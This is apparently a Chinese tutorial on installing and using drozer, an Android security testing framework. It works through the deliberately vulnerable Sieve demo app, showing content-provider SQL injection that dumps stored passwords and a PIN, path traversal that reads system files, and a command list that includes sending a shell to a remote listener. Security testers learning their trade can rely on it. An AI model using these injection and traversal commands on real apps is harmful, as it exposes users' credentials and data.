简介
drozer官网
drozer github
drozer 是一款针对 Android 系统的安全测试框架。
drozer 安装
俩种安装方式:
一、直接安装,官网下载编译好的 whl 文件直接安装
二、编译安装,下载源码编译安装
环境问题 - 避免安装遇到问题,请检查以下项
Python2.7 三颗星
Protobuf 2.6 or greater
Pyopenssl 16.2 or greater
Twisted 10.2 or greater
Java Development Kit 1.7 三颗星
Android Debug Bridge
直接安装
- 下载最新的 drozer.whl 到本地,然后使用 python 方式安装
sudo pip2 install drozer-2.4.4-py2-none-any.whl
下载 Agent.apk 并安装到手机上,进入该应用 Embedded Server 选择开启,建立手机与 PC 的连接
建立端口号转发,drozer使用31415端口
adb forward tcp:31415 tcp:31415
- 连接 drozer 检查是否成功
drozer console connect
结果如下所示:
$ > drozer console connect
Selecting 5ea648cc75e73af3 (Xiaomi Mi Note 3 8.1.0)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.4)
dz>
直接安装 Q & A
Q1
警告如下:
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
A1
需要安装service_identity,注意使用 pip 版本是2还是3,drozer 使用的是 python2
pip install service_identity
安装位置/usr/local/lib/python2.7/site-packages,需要依赖如下几个包 attrs, pyOpenSSL >= 0.14 (0.12 and 0.13 may work but are not part of CI anymore), pyasn1, pyasn1-modules, ipaddress on Python 2.7,具体参考
Q2
报错如下
drozer Server requires Twisted to run.
Run 'pip install twisted' to fetch this dependency.
A2
根据提示运行 pip2 install twisted
重新运行drozer console connect 进入drozer 模式下
编译安装
推荐阅读
https://github.com/mwrlabs/drozer
https://github.com/mwrlabs/drozer/wiki/Running-on-the-edge
安装方式一
- 下载源码
git clone https://github.com/mwrlabs/drozer/
- 切换到下载的 drozer 源码目录
cd drozer
- 编译
python2 setup.py build
4.安装
python2 setup.py install
安装位置/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg
后续java插件使用
java插件在drozer/src/drozer/modules/common中添加Test.java,如需使用可重复编译安装,不影响之前安装
python2 setup.py build
// 上一命令可不执行,install 时会先构建编译
python2 setup.py install
其中python2 setup.py build之后生成三个文件+原先的Test.java,
Test.java
Test$test.class
Test.class
Test.apk
最终目标使用Test.apk,只将 apk 放进安装位置中/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/modules/common
也可使用以下命令,只生成 Test.apk 一个文件,然后拖进安装位置
make apks
安装方式二
github 使用方式
git clone https://github.com/mwrlabs/drozer/
cd drozer
python2 setup.py bdist_wheel
cd dist
pip2 install drozer-2.4.3-py2-none-any.whl
安装位置/usr/local/lib/python2.7/site-packages/drozer和/usr/local/lib/python2.7/site-packages/drozer-2.4.3.dist-info
后续java插件使用
java插件在drozer/src/drozer/modules/common中添加Test.java,可重复上述命令,但不会覆盖安装,需要先卸载再安装才能生效,推荐使用第一种方式,简单一点
使用make apks只生成 apks,加载 java 不会成功,关键是依靠 class 文件最终生成 apk进行使用,或者如下生成
javac -cp lib/android.jar dextest.java
dx --dex --output=dextest.apk dextest*.class
编译安装 Q&A
Q1
报错如下
/bin/sh: protoc: command not found?
A1
网上找了很多种方案,最后采用如下方式安装
brew install grpc protobuf
Q2
报错如下:
UNEXPECTED TOP-LEVEL EXCEPTION:
com.android.dx.cf.iface.ParseException: bad class file magic (cafebabe) or version (0034.0000)
A2
分析: dx 的问题
解决:修改Makefile文件,将DX环境变量指向dorzer源代码自带的dx,DX = $(CURDIR)/src/drozer/lib/dx ,其他javac,NDKBUILD等环境变量按自己的系统环境指定
结果:无效,因为之前都是使用 make命令整体安装,如下, 一直报错不能向下进行,比如 md5sum command no found或者make: dpkg: No such file or directory 等
// 安装好drozer的Python依赖库
$ easy_install -–allow-hosts pypi.python.org protobuf==2.4.1
$ easy_install twisted==10.2.0
git clone git://github.com/mwrlabs/drozer/
cd drozer
cp src/drozer/meta.py .
// 修改Makefile文件 将DX环境变量指向dorzer源代码自带的dx
// DX = $(CURDIR)/src/drozer/lib/dx
// 其他javac,NDKBUILD等环境变量按自己的系统环境指定。
make
python setup.py install
分析:网上搜索是必须制定 java7
解决1:指定 Java 运行环境,在~/.drozer.config文件下 ,注意格式,但亲测没有用
[executables]
java = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/java
javac = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/javac
解决2:.bash_profile 配置环境变量,成功
使用
- 基本使用
- 模块使用
- python 模块
pythonb 编写定制需要的测试模块,扩展drozer console的测试功能 - dex 模块
java 编写的 android 代码,扩展drozer agent的功能
- python 模块
基本使用
官方文档安装使用说明
官方测试 sieve.apk
1. 关键字查找包名
dz> run app.package.list -f sieve
com.mwr.example.sieve
查看所有安装包 run app.package.list
2. 查看包信息
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Application Label: Sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/user/0/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-z3nWTMbV0D6n2Ak5bB1Hvg==/base.apk
UID: 11069
GID: [3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
3. 攻击面分析
查看四个组件是否能被其他应用调用
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
4. 四大组件之 Activity
4.1 查看可被调用的 Activity
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
Permission: null
com.mwr.example.sieve.MainLoginActivity
Permission: null
com.mwr.example.sieve.PWList
Permission: null
4.2 启动可被调用的 Activity
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
更多参数使用
dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
Starts an Activity using the formulated intent.
Examples:
Start the Browser with an explicit intent:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags ACTIVITY_NEW_TASK
If no flags are specified, drozer will add the ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags 0x0
Starting the Browser with an implicit intent:
dz> run app.activity.start
--action android.intent.action.VIEW
--data-uri http://www.google.com
--flags ACTIVITY_NEW_TASK
For more information on how to formulate an Intent, type 'help intents'.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
--action ACTION specify the action to include in the Intent
--category CATEGORY [CATEGORY ...]
specify the category to include in the Intent
--component PACKAGE COMPONENT
specify the component name to include in the Intent
--data-uri DATA_URI specify a Uri to attach as data in the Intent
--extra TYPE KEY VALUE
add an field to the Intent's extras bundle
--flags FLAGS [FLAGS ...]
specify one-or-more flags to include in the Intent
--mimetype MIMETYPE specify the MIME type to send in the Intent
5. 四大组件之 Content Provider
5.1 查看可被访问的 Content Provider
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
分析:存在导出风险,没有导出风险如下提示
dz> run app.service.info -a com.xxxxx.sample
Package: com.xxxxx.sample
No exported services.
5.2 查看可被访问的 Content Provider 的 URI (数据泄露)
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider/
Unable to Query content://com.mwr.example.sieve.DBContentProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords/
Able to Query content://com.mwr.example.sieve.DBContentProvider/Keys/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
5.2 查看 URI 的数据信息
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id 1
service 1qazxsw23edcvfr4
username 1qazxsw23edcvfr4
password xLy+YA+alamO1WSy2lMhYCnxL+sHYWh3jSAWMaMhQdU= (Base64-encoded)
email
5.3 SQL 注入
5.3.1 查询 app.provider.query
help app.provider.query
5.3.1.1 查看数据库所有表信息
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email ) |
| table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) | |
5.3.1.2 查看单张表数据
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password | pin |
| 1qazxsw23edcvfr4 | 9999 |
5.3.2 插入 app.provider.insert
5.3.3 更新 app.provider.update
5.3.4 删除 app.provider.delete
以上使用通过帮助命令查看,eg: help app.provider.insert
5.3.4 下载数据库到本地 app.provider.download
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db .
5.3.5 读取系统底层文件 app.provider.read
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
5.4 检查 ContentProvider 的安全性
5.4.1 检测是否有 SQL注入
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.DBContentProvider
content://com.mwr.example.sieve.FileBackupProvider
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
5.4.2 检查是否存在遍历文件的漏洞
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/Passwords/
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
6. 四大组件之 Service
6.1 查看可使用的 services 命令
dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
分析: 存在风险,没有导出提示No exported services.
6.2 向服务发送信息
dz> run app.service.send com.example.srv com.example.srv.Service --msg 1 2 3 --extra float value 0.1324 --extra string test value
Did not receive a reply from com.example.srv/com.example.srv.Service.
7. 四大组件之 Broadcast
查看可以使用的 Broadcast
dz> run app.broadcast.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
No matching receivers.
8. drozer 命令检测集合
app.activity.forintent Find activities that can handle the given intent
app.activity.info Gets information about exported activities.
app.activity.start Start an Activity
app.broadcast.info Get information about broadcast receivers
app.broadcast.send Send broadcast using an intent
app.broadcast.sniff Register a broadcast receiver that can sniff
particular intents
app.package.attacksurface Get attack surface of package
app.package.backup Lists packages that use the backup API (returns true
on FLAG_ALLOW_BACKUP)
app.package.debuggable Find debuggable packages
app.package.info Get information about installed packages
app.package.launchintent Get launch intent of package
app.package.list List Packages
app.package.manifest Get AndroidManifest.xml of package
app.package.native Find Native libraries embedded in the application.
app.package.shareduid Look for packages with shared UIDs
app.provider.columns List columns in content provider
app.provider.delete Delete from a content provider
app.provider.download Download a file from a content provider that supports
files
app.provider.finduri Find referenced content URIs in a package
app.provider.info Get information about exported content providers
app.provider.insert Insert into a Content Provider
app.provider.query Query a content provider
app.provider.read Read from a content provider that supports files
app.provider.update Update a record in a content provider
app.service.info Get information about exported services
app.service.send Send a Message to a service, and display the reply
app.service.start Start Service
app.service.stop Stop Service
auxiliary.webcontentresolver
Start a web service interface to content providers.
exploit.jdwp.check Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider
Reads APN content provider
exploit.pilfer.general.settingsprovider
Reads Settings content provider
information.datetime Print Date/Time
information.deviceinfo Get verbose device information
information.permissions Get a list of all permissions used by packages on the
device
intents.fuzzinozer fuzzinozer
scanner.activity.browsable Get all BROWSABLE activities that can be invoked from
the web browser
scanner.misc.checkjavascriptbridge
Check if addJavascriptInterface is used and can be
abused
scanner.misc.native Find native components included in packages
scanner.misc.readablefiles Find world-readable files in the given folder
scanner.misc.secretcodes Search for secret codes that can be used from the
dialer
scanner.misc.sflagbinaries Find suid/sgid binaries in the given folder (default
is /system).
scanner.misc.writablefiles Find world-writable files in the given folder
scanner.provider.finduris Search for content providers that can be queried from
our context.
scanner.provider.injection Test content providers for SQL injection
vulnerabilities.
scanner.provider.sqltables Find tables accessible through SQL injection
vulnerabilities.
scanner.provider.traversal Test content providers for basic directory traversal
vulnerabilities.
shell.exec Execute a single Linux command.
shell.send Send an ASH shell to a remote listener.
shell.start Enter into an interactive Linux shell.
simple.attack.activity Gets information about exported activities then start
them
tools.file.download Download a File
tools.file.md5sum Get md5 Checksum of file
tools.file.size Get size of file
tools.file.upload Upload a File
tools.setup.busybox Install Busybox.
tools.setup.minimalsu Prepare 'minimal-su' binary installation on the device.
模块使用
python 模块
流程:创建模块仓库 -> 编写模块 -> 安装模块 -> 运行模块
1. 创建模块仓库
- 方式一
在 drozer console 中创建 repositories 文件夹作为仓库
# !bash
dz> module repository create [/absolute_path/repositories]
- 方式二
在~/.drozer_config中指定仓库
[repositories]
/absolute_path/repositories = /absolute_path/repositories
2.编写模块
以 官方Demo为例,编写 GetInteger.py 文件,代码如下
#!python
from drozer.modules import Module
class GetInteger(Module):
name = ""
description = ""
examples = ""
author = "Joe Bloggs (@jbloggs)"
date = "2012-12-21"
license = "BSD (3-clause)"
path = ["exp", "random"]
def execute(self, arguments):
random = self.new("java.util.Random")
integer = random.nextInt()
self.stdout.write("int: %d\n" % integer)
说明
name 模块的名称
description 模块的功能描述
examples 模块的使用示例
author 作者
date 日期
license 许可
path 描述模块命令空间
其中path = ["exp", "test"],类型为 GetInteger,模块以exp.random.getinteger 唯一确定
3.安装模块
方式一
采用python包管理方式,在 repositories 目录下创建目录 exp,新建 ini.py 空白文件,然后将模块(即上述GetInteger.py文件)放入 exp 目录中即可方式二
在 drozer console 中使用 module install 命令安装,将编号的 python 模块源文件命名为 getintegerbefore.getintegerafter,在 drozer console 中执行
# !bash
dz> module install [/path/repositories]
在repositories仓库下回生成 getintegerbefore文件夹,文件夹下包含 init.py 和 getintegerafter.py 俩个文件
绝对路径和相对路径均可,推荐绝对路径
- 安装远程模块
安装 mwr labs github 提供的模块,例如
#!bash
dz>module install jubax.javascript
3.运行模块
在 drozer console 中运行模块,执行
# !bash
dz> run exp.random.getinteger
int: 261603234
- 和路径无关
- 不区分大小写
- 只与文件中声明的 path (eg: path = ["ex", "random"])和类(eg: GetInteger)名有关,最后为
exp.random.getinteger,不过建议和路径保持一致,防止出现错误退出
异常问题,没有错误日志信息,直接退出 drozer,我的天!!如 Path 重复
如果文件中有汉字,注意保存格式为 UTF-8 with BOM,否则直接退出 drozer
dex 模块
流程:编写 java 插件代码 -> 安装 java 插件 -> 编写 python 模块验证
1.编写 java 插件代码
例如如下代码
import android.content.Intent;
import android.content.Context;
import java.io.Serializable;
public class IntentTest {
public static class test implements Serializable {
}
public static boolean superfuzz_Activity(Context context ,String package_params, String compoment_params ){
Intent intent = new Intent();
intent.setClassName( package_params , compoment_params);
intent.putExtra("serializable_key",new test());
intent.setFlags(0x10000000);
context.startActivity(intent);
return true;
}
}
2.安装插件
根绝上方安装 drozer 时的方式,选择之前对应的“后续使用”方式
3.编写 python 模块验证
根据上方“python 模块”步骤编写安装 python 模块
# !python
from drozer.modules import common, Module
class TestIntent(Module,common.ClassLoader):
name = ""
description = ""
examples = ""
author = ""
date = ""
license = ""
path = ["exp", "test"]
def execute(self, arguments):
TestIntent = self.loadClass("common/IntentTest.apk", "TestIntent")
TestIntent.superfuzz_Activity(self.getContext(),"com.xxx.xxx","com.xxx.xxx.MainActivity")
注意:启动该 MainActivity 类问题
- android:exported="true" 属性
Caused by: java.lang.SecurityException: Permission Denial: starting Intent
- 在AndroidManifest.xml中声明,并且启动代码包名和类名必须按照如下格式
包名:com.xxx.xxx
类名:com.xxx.xxx.MainActivity
Intent intent = new Intent();
intent.setClassName("com.simple.hookapp", "com.simple.hookapp.MainActivity");
startActivity(intent);
Caused by: android.content.ActivityNotFoundException: Unable to find
explicit activity class {com.xxx.xxx/MainFragmentActivity};
have you declared this activity in your AndroidManifest.xml?
在 drozer console下运行验证
#!bash
dz> run exp.test.testintent
调试运行
1. 在 debug 模式下运行 drozer
drozer console connect --debug
2. 修改插件后,然后重新加载
dz> reload
关于失效的问题,采取该方案
在/drozer/src/drozer/console/session.py 路径下找到 session 文件,并找到下面代码进行修改
#!python
def __module(self, key):
"""
Gets a module instance, by identifier, and initialises it with the
required session parameters.
"""
module = None
try:
module = self.modules.get(self.__module_name(key))
except KeyError:
pass
if module == None:
try:
module = self.modules.get(key)
except KeyError:
pass
if module == None:
raise KeyError(key)
else:
# reload module
# 注释原先上面一行代码,修改为下方代码
mod = reload(sys.modules[module.__module__])
module_class_name = module.__name__
module_class = getattr(mod,module_class_name) #get module class object
return module_class(self)
然后重新构建安装 drozer,或者直接在安装位置修改/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/console/session.py
3. 重新运行
dz> run xx.xx.xx
在线检测工具
来自 https://www.jianshu.com/p/81bc16a7ac67
腾讯金刚审计系统 http://service.security.tencent.com/kingkong 免费 无限制
腾讯御安全 http://yaq.qq.com/ 免费 查看漏洞详情需认证
阿里聚安全 http://jaq.alibaba.com/ 免费 查看漏洞详情需认证
360显微镜 http://appscan.360.cn/ 免费 无限制
360APP漏洞扫描 http://dev.360.cn/html/vulscan/scanning.html 免费 无限制
百度MTC http://mtc.baidu.com 9.9元/次 无限制
梆梆 https://dev.bangcle.com 免费 无限制
爱内测 http://www.ineice.com/ 免费 无限制
通付盾 http://www.appfortify.cn/ 免费 无限制
NAGA http://www.nagain.com/appscan/ 免费 无限制
GES审计系统 http://01hackcode.com/ 免费 无限制
盘古出品的Janeushttp://appscan.io
Janus http://cloud.appscan.io
APP逆向main_classify_list https://android.fallible.co/
java在线反编译Java decompiler online http://www.javadecompilers.com
腾讯电脑管家:哈勃 http://habo.qq.com/
腾讯TSRC:金刚 http://service.security.tencent.com/
阿里聚安全:http://jaq.alibaba.com/
西安交通大学 sanddroid:http://sanddroid.xjtu.edu.cn/#home
金山火眼:http://fireeye.ijinshan.com/analyse.html
瀚海源文件B超:https://b-chao.com
参考资料
谢谢以下作者的文章
https://testerhome.com/topics/2209/show_wechat
https://juejin.im/post/5aa1191c6fb9a028d936be30
http://ju.outofmemory.cn/entry/170782
http://www.lynnshare.cc/article/?id=36
http://blog.0kami.cn/2016/08/20/old-how-to-install-drozer-on-mac/